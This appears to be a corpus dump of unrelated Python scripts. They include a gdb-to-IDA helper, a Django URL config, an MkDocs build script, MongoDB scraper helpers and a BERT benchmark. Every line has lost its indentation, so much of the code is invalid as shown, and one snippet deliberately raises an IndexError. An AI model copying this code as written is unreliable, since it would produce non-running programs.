print("Now setting vectors")
plt.pause(1.0)
plt.tight_layout()
for phi in np.linspace(0, 360, 30) * u.deg:
r = np.cos(phi / 2)
ad.set_vector_rho_phi(r, phi)
plt.pause(0.01)
ad.set_vector_rho_phi(0, 0 * u.deg)
plt.pause(1.0)
print("Now setting values")
ad.telescopes.set_linewidth(0)
for ii in range(50):
vals = np.random.uniform(100.0, size=subarray.num_tels)
ad.values = vals
plt.pause(0.01)
print("Setting labels")
for ii in range(3):
ad.add_labels()
plt.pause(0.5)
ad.remove_labels()
plt.pause(0.5)
| nilq/baby-python | python |
lists = ['1', '2', '3']
print(lists[3])
| nilq/baby-python | python |
import torch
from torch.utils.data import DataLoader
import pytorch_lightning as pl
import scipy as sp
import numpy as np
import scipy.ndimage
from cyclic_gps.models import LEGFamily
from cyclic_gps.data_utils import time_series_dataset
import matplotlib.pyplot as plt
num_datapoints = 1000
DTYPE = torch.double
RANK = 5
MAX_EPOCHS = 800
OPTIMIZER = "ADAM" #or "ADAM" || "BFGS"
with open("../numpy_arrays/all_ts_2.npy", "rb") as f:
all_ts = np.load(f)
with open("../numpy_arrays/all_vals_2.npy", "rb") as f:
all_vals = np.load(f)
all_ts = torch.from_numpy(all_ts)
all_vals = torch.from_numpy(all_vals)
print(all_ts.shape)
print(all_vals.shape)
# create a torch dataset, and add a batch dim of zero
dataset = time_series_dataset(all_ts, all_vals)
example = dataset[0]
#print("example datatype: {}".format(example[0].dtype))
assert torch.allclose(example[0], all_ts.unsqueeze(0))
dl = DataLoader(dataset=dataset, batch_size=1)
leg_model = LEGFamily(rank=RANK, obs_dim=all_vals.shape[2], train=True, optimizer=OPTIMIZER, data_type=DTYPE)
leg_model.double()
trainer = pl.Trainer(max_epochs=MAX_EPOCHS)
trainer.fit(model=leg_model, train_dataloaders=dl)
#print(leg_model.G)
leg_model.register_model_matrices_from_params()
#print(leg_model.G)
PATH_TO_NPY = "../numpy_arrays/"
with open(PATH_TO_NPY + "sample3_ts_2.npy", "rb") as f:
sample3_ts = np.load(f)
with open(PATH_TO_NPY + "sample3_vals_2.npy", "rb") as f:
sample3_vals = np.load(f)
sample3_ts = torch.from_numpy(sample3_ts)
sample3_vals = torch.from_numpy(sample3_vals)
# sample3_ts_chopped = sample3_ts[:200]
# sample3_vals_chopped = sample3_vals[:200]
# forecast_times = sample3_ts[200:300]
sample3_ts_chopped = torch.cat([sample3_ts[:200], sample3_ts[-200:]], dim=0)
sample3_vals_chopped = torch.cat([sample3_vals[:200], sample3_vals[-200:]], dim=0)
print("sample_3 shapes: ts:{}, vals:{}".format(sample3_ts_chopped.shape, sample3_vals_chopped.shape))
with open(PATH_TO_NPY + "forecast_times_2.npy", "rb") as f:
forecast_times = np.load(f)
forecast_times = torch.from_numpy(forecast_times)
pred_means, pred_variances = leg_model.make_predictions(sample3_ts_chopped, sample3_vals_chopped, forecast_times)
#print("data type precision:{}".format(pred_means.dtype))
pred_means = pred_means.detach().numpy()
pred_variances = pred_variances.detach().numpy()
plt.scatter(sample3_ts_chopped, sample3_vals_chopped[:, 0], label='observed data')
plt.scatter(sample3_ts[200:-200], sample3_vals[200:-200][:, 0],label='censored data')
plt.plot(forecast_times, pred_means[:,0], 'C1', label='interpolation/forecasting')
plt.fill_between(forecast_times,
pred_means[:,0]+2*np.sqrt(pred_variances[:,0,0]),
pred_means[:,0]-2*np.sqrt(pred_variances[:,0,0]),
color='black',alpha=.5,label='Uncertainty')
plt.legend() #bbox_to_anchor=[1,1],fontsize=20
plt.show()
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
20a.py
~~~~~~
Advent of Code 2017 - Day 20: Particle Swarm
Part One
Suddenly, the GPU contacts you, asking for help. Someone has asked it to
simulate too many particles, and it won't be able to finish them all in
time to render the next frame at this rate.
It transmits to you a buffer (your puzzle input) listing each particle in
order (starting with particle 0, then particle 1, particle 2, and so on).
For each particle, it provides the X, Y, and Z coordinates for the
particle's position (p), velocity (v), and acceleration (a), each in the
format <X,Y,Z>.
Each tick, all particles are updated simultaneously. A particle's
properties are updated in the following order:
- Increase the X velocity by the X acceleration.
- Increase the Y velocity by the Y acceleration.
- Increase the Z velocity by the Z acceleration.
- Increase the X position by the X velocity.
- Increase the Y position by the Y velocity.
- Increase the Z position by the Z velocity.
Because of seemingly tenuous rationale involving z-buffering, the GPU would
like to know which particle will stay closest to position <0,0,0> in the
long term. Measure this using the Manhattan distance, which in this
situation is simply the sum of the absolute values of a particle's X, Y,
and Z position.
For example, suppose you are only given two particles, both of which stay
entirely on the X-axis (for simplicity). Drawing the current states of
particles 0 and 1 (in that order) with an adjacent a number line and
diagram of current X positions (marked in parenthesis), the following would
take place:
p=< 3,0,0>, v=< 2,0,0>, a=<-1,0,0> -4 -3 -2 -1 0 1 2 3 4
p=< 4,0,0>, v=< 0,0,0>, a=<-2,0,0> (0)(1)
p=< 4,0,0>, v=< 1,0,0>, a=<-1,0,0> -4 -3 -2 -1 0 1 2 3 4
p=< 2,0,0>, v=<-2,0,0>, a=<-2,0,0> (1) (0)
p=< 4,0,0>, v=< 0,0,0>, a=<-1,0,0> -4 -3 -2 -1 0 1 2 3 4
p=<-2,0,0>, v=<-4,0,0>, a=<-2,0,0> (1) (0)
p=< 3,0,0>, v=<-1,0,0>, a=<-1,0,0> -4 -3 -2 -1 0 1 2 3 4
p=<-8,0,0>, v=<-6,0,0>, a=<-2,0,0> (0)
At this point, particle 1 will never be closer to <0,0,0> than particle 0,
and so, in the long run, particle 0 will stay closest.
Which particle will stay closest to position <0,0,0> in the long term?
:copyright: (c) 2017 by Martin Bor.
:license: MIT, see LICENSE for more details.
"""
import sys
from vector import Vector
class Particle(object):
def __init__(self, i, p, v, a):
self.i = i
self.p = p
self.v = v
self.a = a
def __iter__(self):
return self
def __next__(self):
self.update()
return self
def ff(self, t):
"""Fast forward the position by t ticks"""
self.p = t**2 * self.a + t * self.v + self.p
def update(self):
"""Update positon according to acceleration and velocity vectors"""
self.v += self.a
self.p += self.v
def __abs__(self):
"""Return lenght of vector position"""
return abs(self.p)
def __repr__(self):
return f"id={self.i}, p={self.p}, v={self.v}, a={self.a}"
def solve(system):
"""Return ID of particle who stays the closest to <0,0,0> in the long term.
:system: particle initial system with position, velocity and acceleration
vectors
:returns: particle ID of the closest to <0,0,0> in the long term.
>>> solve('''p=<3,0,0>, v=<2,0,0>, a=<-1,0,0>
... p=<4,0,0>, v=<0,0,0>, a=<-2,0,0>''')
0
"""
particles = []
for i, line in enumerate(system.strip().split('\n')):
vectors = line.strip().split(', ')
p, v, a = (Vector(*map(int, v[3:-1].split(','))) for v in vectors)
particles.append(Particle(i, p, v, a))
t = 10000
for p in particles:
p.ff(t)
return sorted(particles, key=abs)[0].i
def main(argv):
if len(argv) == 2:
f = open(argv[1], 'r')
else:
sys.stderr.write('reading from stdin...\n')
print(solve(f.read()))
if __name__ == "__main__":
sys.exit(main(sys.argv))
| nilq/baby-python | python |
expected_output = {
"cos-interface-information": {
"interface-map": {
"i-logical-map": {
"cos-objects": {
"cos-object-index": ["9", "13"],
"cos-object-name": [
"dscp-ipv6-compatibility",
"ipprec-compatibility",
],
"cos-object-subtype": ["dscp-ipv6", "ip"],
"cos-object-type": ["Classifier", "Classifier"],
},
"i-logical-index": "335",
"i-logical-name": "ge-0/0/2.0",
},
"interface-congestion-notification-map": "Disabled",
"interface-exclude-queue-overhead-bytes": "disabled",
"interface-index": "150",
"interface-logical-interface-aggregate-statistics": "disabled",
"interface-name": "ge-0/0/2",
"interface-queues-in-use": "4",
"interface-queues-supported": "8",
"interface-shaping-rate": "1000000",
"scheduler-map-index": "2",
"scheduler-map-name": "<default>",
}
}
}
| nilq/baby-python | python |
from django.conf.urls import include, url
from django.urls import path
from django.contrib import admin
from django.views.generic import TemplateView
from rest_framework.permissions import IsAuthenticated
from elvanto_sync import views_api as va
from elvanto_sync import views_buttons as vb
from elvanto_sync.mixins import LoginRequiredMixin
from elvanto_sync.models import ElvantoGroup, ElvantoPerson
from elvanto_sync.serializers import (ElvantoGroupSerializer, ElvantoPersonSerializer)
from django.conf.urls import include, url
admin.autodiscover()
class RestrictedTemplateView(LoginRequiredMixin, TemplateView):
pass
auth_patterns = [
url(r'^auth/', include('allauth.urls')),
]
urls_basic = [
path(r'admin/', admin.site.urls),
url(r'^$', RestrictedTemplateView.as_view(template_name='elvanto_sync/index.html'), name='index'),
url(
r'^group/(?P<pk>[0-9]+)$',
RestrictedTemplateView.as_view(template_name='elvanto_sync/index.html'),
name='group'
)
]
urls_buttons = [
url(r'^buttons/update_global/$', vb.UpdateGlobal.as_view(), name='button_update_global'),
url(r'^buttons/update_local/$', vb.UpdateLocal.as_view(), name='button_update_local'),
url(r'^buttons/update_sync/$', vb.UpdateSync.as_view(), name='button_update_sync'),
url(r'^buttons/push_all/$', vb.PushAll.as_view(), name='button_push_all'),
url(r'^buttons/pull_all/$', vb.PullAll.as_view(), name='button_pull_all'),
url(r'^buttons/push_group/$', vb.PushGroup.as_view(), name='button_push_group'),
]
urls_api = [
# api
url(
r'^api/v1/elvanto/groups/$',
va.ApiCollection.as_view(
model_class=ElvantoGroup, serializer_class=ElvantoGroupSerializer, permission_classes=(IsAuthenticated, )
),
name='api_groups'
),
url(
r'^api/v1/elvanto/groups/(?P<pk>[0-9]+)$',
va.ApiMember.as_view(
model_class=ElvantoGroup,
serializer_class=ElvantoGroupSerializer,
permission_classes=(IsAuthenticated, ),
),
name='api_group'
),
url(
r'^api/v1/elvanto/people/$',
va.ApiCollection.as_view(
model_class=ElvantoPerson, serializer_class=ElvantoPersonSerializer, permission_classes=(IsAuthenticated, )
),
name='api_people'
),
]
urlpatterns = auth_patterns + urls_buttons + urls_api + urls_basic
| nilq/baby-python | python |
#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
#
# Builds the GitHub Wiki documentation into a static HTML site.
#
# Copyright (c) 2015 carlosperate https://github.com/carlosperate/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This script does the following to build the documentation:
# Pulls the latest changes from the GitHub Wiki repository
# Edits the MkDocs configuration file to include all the markdown files
# Creates an index.html file to have root redirected to a specific page
# Builds the static site using MkDocs
# REMOVES the root Documentation folder
# Copies the generate content into the root Documentation folder
#
from __future__ import unicode_literals, absolute_import
import os
import sys
import shutil
import subprocess
from tempfile import mkstemp
# mkdocs used only in the command line, imported just to ensure it's installed
try:
import mkdocs
except ImportError:
print("You need to have mkdocs installed !")
sys.exit(1)
# Path data
GITHUB_USER = "ngageoint"
WIKI_NAME = "scale.wiki"
GITHUB_WIKI_REPO = "github.com/%s/%s.git" % (GITHUB_USER, WIKI_NAME)
GIT_INIT_SCRIPT = 'setup_wiki_git.sh'
MKDOCS_FOLDER = "wiki"
THIS_FILE_DIR = os.path.dirname(os.path.realpath(__file__))
MKDOCS_DIR = os.path.join(THIS_FILE_DIR, MKDOCS_FOLDER)
WIKI_DIR = os.path.join(MKDOCS_DIR, WIKI_NAME)
GIT_INIT_FILE = os.path.join(WIKI_DIR, GIT_INIT_SCRIPT)
DEFAULT_INDEX = 'Home'
def pull_wiki_repo():
"""
Pulls latest changes from the wiki repo.
:return: Boolean indicating if the operation was successful.
"""
# Set working directory to the wiki repository
wiki_folder = os.path.join(MKDOCS_DIR, WIKI_NAME)
if os.path.isdir(wiki_folder):
os.chdir(wiki_folder)
else:
print("ERROR: Wiki repo directory is not correct: %s" % wiki_folder)
return False
# Init git in the wiki folder
subprocess.call(["sh", GIT_INIT_FILE])
# Ensure the submodule is initialised, progress is printed to stderr so just
# call subprocess with all data sent to console and error check later
subprocess.call(["git", "submodule", "update", "--init", "--recursive"])
# Ensure the subfolder selected is the correct repository
pipe = subprocess.PIPE
git_process = subprocess.Popen(
["git", "config", "--get", "remote.origin.url"],
stdout=pipe, stderr=pipe)
std_op, std_err_op = git_process.communicate()
if std_err_op:
print("ERROR: Could not get the remote information from the wiki "
"repository !\n%s" + std_err_op)
return False
if not GITHUB_WIKI_REPO in std_op:
print(("ERROR: Wiki repository:\n\t%s\n" % GITHUB_WIKI_REPO) +
"not found in directory %s url:\n\t%s\n" % (wiki_folder, std_op))
return False
# Git Fetch prints progress in stderr, so cannot check for erros that way
print("\nPull from Wiki repository...")
subprocess.call(["git", "pull", "origin", "master"])
print("")
return True
def edit_mkdocs_config():
"""
Edits the mkdocs.yml MkDocs configuration file to include all markdown
files as part of the documentation.
These files are created by default with the '.md' extension and it is
assumed no other file extensions are to be linked.
:return: Boolean indicating the success of the operation.
"""
path_list = []
for file in os.listdir(os.path.join(MKDOCS_DIR, WIKI_NAME)):
if file.endswith(".md"):
path_list.append("- '%s': '%s'" %
(file, file[:-3].replace("-", " ")))
if not path_list:
print(("ERROR: No markdown files found in %s ! " % MKDOCS_DIR) +
"Check if repository has been set up correctly.")
return False
pages_str = "pages:\n" + "\n".join(path_list) + "\n"
# Replace the pages data, strategically located at the end of the file
mkdocs_yml = os.path.join(MKDOCS_DIR, "mkdocs.yml")
if not os.path.exists(mkdocs_yml):
print("ERROR: The MkDocs config file %s does not exist !" % mkdocs_yml)
return False
# Copy config file until the pages line, strategically located at the end
temp_file_handler, temp_abs_path = mkstemp()
with open(temp_abs_path, 'w') as temp_file:
with open(mkdocs_yml) as original_file:
for line in original_file:
if not "pages:" in line:
temp_file.write(line)
else:
print("Replacing 'pages' property found in mkdocs.yml ...")
break
else:
print("Did not find the 'pages' property in mkdocs.yml.\n" +
"Attaching the property at the end of the file.")
temp_file.write(pages_str)
print(pages_str)
# Remove original file and move the new temp to replace it
os.close(temp_file_handler)
try:
os.remove(mkdocs_yml)
except IOError:
print("ERROR: Could not delete original config file %s !" % mkdocs_yml)
return False
try:
shutil.move(temp_abs_path, mkdocs_yml)
except shutil.Error:
print("ERROR: Could move new config file to %s !" % mkdocs_yml)
return False
return True
def create_index():
"""
Creates an HTML index page to redirect to an MkDocs generated page.
:return: Boolean indicating the success of the operation.
"""
html_code = \
"<!DOCTYPE HTML>\n " \
"<html>\n" \
"\t<head>\n" \
"\t\t<meta charset=\"UTF-8\">\n" \
"\t\t<meta http-equiv=\"refresh\" content=\"1;url=%s/index.html\">\n" \
% DEFAULT_INDEX + \
"\t\t<script type=\"text/javascript\">\n" \
"\t\t\twindow.location.href = \"%s/index.html\"\n" % DEFAULT_INDEX +\
"\t\t</script>\n" \
"\t</head>\n" \
"\t<body>\n" \
"\t\tIf you are not redirected automatically to the " \
"%s page, follow this <a href=\"%s/index.html\">link</a>\n"\
% (DEFAULT_INDEX, DEFAULT_INDEX) + \
"\t</body>\n" \
"</html>\n"
print("Creating the index.html file...\n")
generated_site_dir = os.path.join(MKDOCS_DIR, "site")
if not os.path.exists(generated_site_dir):
try:
os.makedirs(generated_site_dir)
except IOError:
print("ERROR: Could not create site folder in %s !\n" %
generated_site_dir)
return False
try:
index_file = open(os.path.join(generated_site_dir, "index.html"), "w")
index_file.write(html_code)
index_file.close()
return True
except IOError:
print("ERROR: Could not create index.html file in %s !\n" %
generated_site_dir)
return False
def build_mkdocs():
"""
Invokes MkDocs to build the static documentation and moves the folder
into the project root folder.
:return: Boolean indicating the success of the operation.
"""
# Setting the working directory
if os.path.isdir(MKDOCS_DIR):
os.chdir(MKDOCS_DIR)
else:
print("ERROR: MkDocs directory is not correct: %s" % MKDOCS_DIR)
return False
# Building the MkDocs project
pipe = subprocess.PIPE
mkdocs_process = subprocess.Popen(
["mkdocs", "build"], stdout=pipe, stderr=pipe)
std_op, std_err_op = mkdocs_process.communicate()
if std_err_op:
print("ERROR: Could not build MkDocs !\n%s" %
std_err_op)
return False
else:
print(std_op)
# Remove root Documentation folder and copy the new site files into it
generated_site_dir = os.path.join(MKDOCS_DIR, "site")
root_documentation_dir = os.path.join(
os.path.dirname(THIS_FILE_DIR), "documentation")
print("Copy folder %s into %s ...\n" %
(generated_site_dir, root_documentation_dir))
if os.path.exists(root_documentation_dir):
try:
shutil.rmtree(root_documentation_dir)
except shutil.Error:
print("ERROR: Could not remove root documentation folder !")
return False
try:
shutil.move(generated_site_dir, root_documentation_dir)
except shutil.Error:
print("ERROR: Could move new documentation files from " +
"%s to %s !" % (generated_site_dir, root_documentation_dir))
return False
return True
def build_docs():
""" Builds the documentation HTML pages from the Wiki repository. """
success = pull_wiki_repo()
if success is False:
sys.exit(1)
success = edit_mkdocs_config()
if success is False:
sys.exit(1)
# Create index.html before the MkDocs site is created in case the project
# already contains an index file.
success = create_index()
if success is False:
sys.exit(1)
success = build_mkdocs()
if success is False:
sys.exit(1)
print("Build process finished!")
if __name__ == "__main__":
build_docs()
| nilq/baby-python | python |
#---- Python VNF startup for ENCRYPT_2_to_1---
import SSL_listener
import SSL_writer
incomingIP="localhost"
incomingPort=10026
incomingPrivateKeyFile="server.key"
incomingPublicKeyFile="server.crt"
outgoingIP="localhost"
outgoingPort=10027
outgoingPublicKeyFile="server.crt"
def startENCRYPT_2_to_1():
ssl_writer=SSL_writer.SSL_writer(outgoingIP,outgoingPort, outgoingPublicKeyFile)
incoming_ssl_EncryptionVNF= SSL_listener.SSL_listener(incomingIP, incomingPort, incomingPrivateKeyFile, incomingPublicKeyFile,ssl_writer)
| nilq/baby-python | python |
from pymongo import MongoClient
class mongoRPSE:
mongos = ""
#insertar datos
def insert_mongo_files(self,data):
mongoc = MongoClient("localhost:27017")
mongodb = mongoc.rpse
mongodb.empresas_file_process.insert_one(data)
def insert_mongo_score(self,data):
mongoc = MongoClient("localhost:27017")
mongodb = mongoc.rpse
mongodb.empresas_file_score.insert_one(data)
def inset_mongo_count(self,data):
mongoc = MongoClient("localhost:27017")
mongodb = mongoc.rpse
mongodb.empresas_conteo.insert_one(data)
def update_mongo_score(self,data):
mongoc = MongoClient("localhost:27017")
mongodb = mongoc.rpse
mongodb.empresas_file_process.update_one({"_id":data["_id"]},{'$set': data})
#Buscar empresa
def find_diario_in_html(self, html):
diarios = self.findAllDiario()
data = "<meta name=\"url\" content=\"https://"
if(data in str(html).lower()):
for diario in diarios:
print("filtro semana")
d = data+str(diario["url"])
if(d in str(html).lower()):
diarioActual = diario["nombre"].lower()
return diarioActual
data = "<meta property=\"og:url\" content=\"https://"
data1 = "<meta property=\"og:url\" content=\"http://"
if(data in str(html).lower() or data1 in str(html).lower()):
for diario in diarios:
d = data+str(diario["url"])
d1 = data1+str(diario["url"])
if(d in str(html).lower() or d1 in str(html).lower()):
diarioActual = diario["nombre"].lower()
return diarioActual
else:
for diario in diarios:
url = str(diario["url"])
if("www." in url):
url = str(diario["url"])[4:len(url)]
if(url in str(html).lower()):
diarioActual = diario["nombre"].lower()
return diarioActual
return ""
#listar Datos
def find_file_process(self, titulo, empresa):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
files = db.empresas_file_process
query = {"empresa": empresa, "titulo": titulo}
data = files.find(query)
return data
def findAllDiario(self):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
diarios = db.diarios
return diarios.find()
def find_diario(self, diario):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
query = {"nombre": diario}
diario = db.diarios.find(query)
for d in diario:
return d
def findAllEmpresas(self):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
empresas = db.empresas
return empresas.find()
#Filtros para limpiar datos
def html_inicio(self, diario):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
query = {"nombre": diario}
diario = db.diarios.find(query)
for d in diario:
return str(d["inicio"])
def html_fin(self, diario):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
query = {"nombre": diario}
diario = db.diarios.find(query)
for d in diario:
return str(d["fin"])
def prueba(self):
self.mongos = "method prueba"
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
#Insertar Diarios de Prueba
diarios=[
{"url": "www.eltiempo.com", "nombre": "eltiempo", "inicio":"<div class=\"articulo-contenido\" itemprop=\"articleBody\">", "fin": "<div class=\"articulo-enlaces\""},
{"url": "www.elespectador.com", "nombre":"espectador", "inicio": '<div class="node-body content_nota field field--name-body field--type-text-with-summary field--label-hidden', "fin": "</div>"},
{"url": "www.dinero.com", "nombre":"dinero", "inicio": "<div id=\"contentItem\">", "fin": "</div>"},
{"url": "www.semana.com", "nombre":"semana", "inicio": "<!-- Alliance -->", "fin": "</div>"},
{"url": "sostenibilidad.semana.com", "nombre":"sostenibilidad", "inicio": "<!-- Alliance -->", "fin": "</div>"},
{"url": "www.larepublica.co", "nombre":"larepublica", "inicio": "<div class=\"lead\">", "fin": "<p> </p>"},
{"url": "www.portafolio.co", "nombre":"portafolio", "inicio": "<div class=\"article-content\" itemprop=\"articleBody\"", "fin": "<div class=\"article-bottom-ads\""},
{"url": "gerente.com/co", "nombre":"gerente", "inicio": "<div class=\"article-content\">", "fin": "</div>"}]
for d in diarios:
db.diarios.insert_one(d)
#Insertar Informacion de empresas a buscar
empresas = [
{'empresa': 'ECOPETROL', 'clave': ['ecopetrol', 'reficar']},
{'empresa': 'CANACOL ENERGY', 'clave': ['canacol', 'canacol energy']},
{'empresa': 'CEPSA', 'clave': ['cepsa', 'cepsa colombia']},
{'empresa': 'GENERAL', 'clave': ['fracking','gasoductos','petroleras']},
{'empresa': 'BPC', 'clave': ['british petroleum','british petroleum']}]
for d in empresas:
db.empresas.insert_one(d)
| nilq/baby-python | python |
from floodsystem import stationdata
from floodsystem import station
def run():
stations = stationdata.build_station_list()
List = station.inconsistent_typical_range_stations(stations)
print(List)
print(f"Number of inconsistent stations: {len(List)}")
if __name__ == '__main__':
run() | nilq/baby-python | python |
# IME 2022 - LabProg II
#
# Script just testing ploting on python
# This is not working propertly :p
import seaborn as sns
df = sns.load_dataset('iris')
# Usual boxplot
ax = sns.boxplot(x='species', y='sepal_length', data=df)
# Add jitter with the swarmplot function.
ax = sns.swarmplot(x='species', y='sepal_length', data=df, color="grey")
| nilq/baby-python | python |
from . import mixins # noqa
from . import generic # noqa
from . import formview # noqa
from . import detail # noqa
from . import uimock # noqa
| nilq/baby-python | python |
from __future__ import print_function
import gdb
import socket
import pickle
import os
import subprocess as sp
import sys
IDA_HOST = '10.113.208.101'
PORT = 56746
TMPDIR = '/tmp/iddaa'
def connect_ida():
if not os.path.exists(TMPDIR):
os.mkdir(TMPDIR)
try:
sock = socket.create_connection((IDA_HOST, PORT), timeout=3)
return sock
except socket.error as err:
sys.stderr.write("[ERROR] {}\n".format(err))
return None
def show_result(result):
try:
f = open('{}/result'.format(TMPDIR), 'w')
f.write(result)
f.close()
except err:
sys.stderr.write("[ERROR] {}\n".format(''))
return
gdb.execute('shell vim {}/result'.format(TMPDIR))
def send(sock, buf):
if sys.version_info < (3, 0):
sock.send(buf)
else:
sock.send(bytes(buf, 'UTF-8'))
def recv(sock, raw=False):
buf = bytes()
while True:
tmp = sock.recv(4096)
buf += tmp
if not tmp:
break
if raw:
return buf
else:
return buf if sys.version_info < (3, 0) else buf.decode()
def get_ida_symbols():
sock = connect_ida()
if not sock: return
send(sock, 'GETSYM')
buf = recv(sock, True)
with open('{}/symfile'.format(TMPDIR), 'wb') as f:
f.write(buf)
if os.path.exists('{}/symfile'.format(TMPDIR)):
gdb.execute('symbol-file {}/symfile'.format(TMPDIR))
else:
print('Can\'t not receive ida symfile.')
def get_pseudo_code(func):
sock = connect_ida()
if not sock: return
send(sock, 'GETPSEUDOCODE {}'.format(func))
code = recv(sock).strip()
if 'Function not found' in code:
print('[Error] ' + code)
return
show_result(code)
def get_local_type():
sock = connect_ida()
if not sock: return
send(sock, 'GETLOCALTYPE')
buf = recv(sock, True)
local_type = pickle.loads(buf)
with open('{}/localtype.h'.format(TMPDIR), 'wb') as f:
f.write(bytes(local_type['header'], 'UTF-8'))
with open('{}/localtype.cpp'.format(TMPDIR), 'wb') as f:
f.write(bytes(local_type['source'], 'UTF-8'))
cwd = os.getcwd()
os.chdir(TMPDIR)
if sp.check_call('g++ -c -g localtype.cpp'.split(' ')) == 0:
gdb.execute('add-symbol-file {}/localtype.o 0'.format(TMPDIR))
else:
print('Generate symbol file failed')
os.chdir(cwd)
def get_breakpoints():
sock = connect_ida()
if not sock: return
send(sock, 'GETBREAKPOINTS')
buf = recv(sock, True)
bps = pickle.loads(buf)
print(bps)
for bp in bps:
gdb.execute('break *{}'.format(bp))
class IDAPYTHON(gdb.Command):
""" IDA python script wrapper"""
def __init__(self):
super(IDAPYTHON, self).__init__('idapython', gdb.COMMAND_USER)
def invoke(self, args, from_tty):
if args == 'cheatsheet':
self.__cheatsheet()
return
sock = connect_ida()
if not sock: return
send(sock, 'EXECFILE')
buf = ''
try:
f = open(args, 'r')
buf = f.read()
except:
print('[ERROR] File not found.')
return
send(sock, buf)
show_result(recv(sock))
def __cheatsheet(self):
print('IDA python Cheat Sheet')
print()
print('idc MakeComm(addr, comment)')
print('----------------------------------------')
print('Add comment at specified address.')
print('Ex: idc MakeComm(0x804ddaa, \'Soy Sauce\')')
print()
print('idc SetColor(addr, what, color)')
print('----------------------------------------')
print('Set color for specified area')
print('Ex: idc SetColor(0x0804ddaa, 1, 0xaabbcc) // address only')
print(' idc SetColor(0x0804ddaa, 2, 0xaabbcc) // entire function')
print(' idc SetColor(0x0804ddaa, 3, 0xaabbcc) // entire segment')
print()
class IDARPC(gdb.Command):
""" IDA python command wrapper"""
def __init__(self, name):
super(IDARPC, self).__init__(name, gdb.COMMAND_USER)
self.name = name
def invoke(self, args, from_tty):
sock = connect_ida()
if not sock: return
send(sock, 'EXEC {}.{}'.format(self.name, args))
show_result(recv(sock))
IDAPYTHON()
IDARPC('idautils')
IDARPC('idaapi')
IDARPC('idc')
| nilq/baby-python | python |
from tqdm import tqdm
from transformers import AutoTokenizer, AutoModelForSequenceClassification
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from torch.profiler import profile, record_function, ProfilerActivity, schedule
import torch
import torch.cuda as cutorch
import numpy as np
import pandas as pd
import asyncio
import os
os.environ['TOKENIZERS_PARALLELISM'] = "false"
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
from ecosys.utils.logger import Logger
from ecosys.utils.data_processor import processors, output_modes
from ecosys.utils.data_structure import HuggingFaceDataset
logger = Logger(__file__, "info", "w")
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
feature_size = 768
sequence_length = 128
task_name = 'CoLA'
batch_size = 32
base_dir = "/home/oai/share"
tokenizer = AutoTokenizer.from_pretrained(f"{base_dir}/HuggingFace/bert-base-uncased")
model_keys = [
"Distil",
"Base",
"Large",
]
model_paths = [
f"{base_dir}/HuggingFace/distilbert-base-uncased",
f"{base_dir}/HuggingFace/bert-base-uncased",
f"{base_dir}/HuggingFace/bert-large-uncased",
]
model_paths = dict(zip(model_keys, model_paths))
models = dict()
for key in model_keys:
logger.debug("key %s, path %s", key, model_paths[key])
models[key] = AutoModelForSequenceClassification.from_pretrained(model_paths[key]).to(device)
models[key].eval()
# ------------- Dataset Prepare --------------
processor = processors[task_name.lower()]()
output_mode = output_modes[task_name.lower()]
def fill_mask(sentence):
words = sentence.split()
rnd_idx = np.random.randint(0,len(words))
words[rnd_idx] = "[MASK]"
return ' '.join(words)
texts = processor.get_train_tsv(f'/data/GlueData/{task_name}/').reset_index()
texts["sentence"] = texts["sentence"].apply(fill_mask)
encoded_texts = tokenizer(
texts["sentence"].to_list(),
padding = 'max_length',
truncation = True,
max_length=sequence_length,
return_tensors = 'pt'
)
dataset = HuggingFaceDataset(encoded_texts, torch.tensor(texts['label'].to_list()))
sampler = SequentialSampler(dataset)
logger.info("n_samples %s", len(dataset))
# performance_schedule = schedule(
# skip_first=10,
# wait=5,
# warmup=1,
# active=3,
# repeat=2
# )
import subprocess as sp
record = {
'bs': list(),
'key': list(),
'mem': list(),
'tol_t': list(),
'avg_t': list(),
}
def get_gpu_memory():
command = "nvidia-smi --query-gpu=memory.used --format=csv"
memory_used_info = sp.check_output(command.split()).decode('ascii').split('\n')[:-1][1:]
memory_used_values = [int(x.split()[0]) for i, x in enumerate(memory_used_info)]
# return np.sum(memory_used_values)
return memory_used_values[-1]
async def inference(key, input):
models[key](**input)
for key in model_keys:
with torch.no_grad():
for batch_size in [1, 2, 4, 8, 16 ,32, 64, 128, 256, 512]:
dataloader = DataLoader(
dataset, sampler=sampler, batch_size=batch_size
)
starter, ender = torch.cuda.Event(enable_timing=True), torch.cuda.Event(enable_timing=True)
timings = []
starter.record()
loop = asyncio.new_event_loop()
tasks = [
inference(key, input) for input, _ in dataloader
]
loop.run_until_complete(asyncio.wait(tasks))
ender.record()
torch.cuda.synchronize()
loop.close()
# for input, _ in tqdm(dataloader, desc="Measuring"):
# models[key](**input)
curr_time = starter.elapsed_time(ender)
timings.append(curr_time)
# print(dir(cutorch.get_device_properties(device)))
# print(prof.key_averages())
record['bs'].append(batch_size)
record['key'].append(key)
record['mem'].append(get_gpu_memory())
record['tol_t'].append(np.sum(timings))
record['avg_t'].append(np.mean(timings))
logger.info(
"bs %s; key %s; Mem (MiB) %s; total time (ms) %s; avg time (ms) %s",
batch_size,
key,
get_gpu_memory(),
np.sum(timings),
np.mean(timings)
)
# logger.info("bs %s; key %s;\n\n %s \n\n ", batch_size, key, prof.key_averages().table(sort_by="cuda_time_total"))
df = pd.DataFrame(record)
df.to_csv(os.path.join(os.path.dirname(__file__), f"lm_throughput_{task_name}.csv")) | nilq/baby-python | python |
from mpl_toolkits import mplot3d
import numpy as np
import matplotlib.pyplot as plt
import math
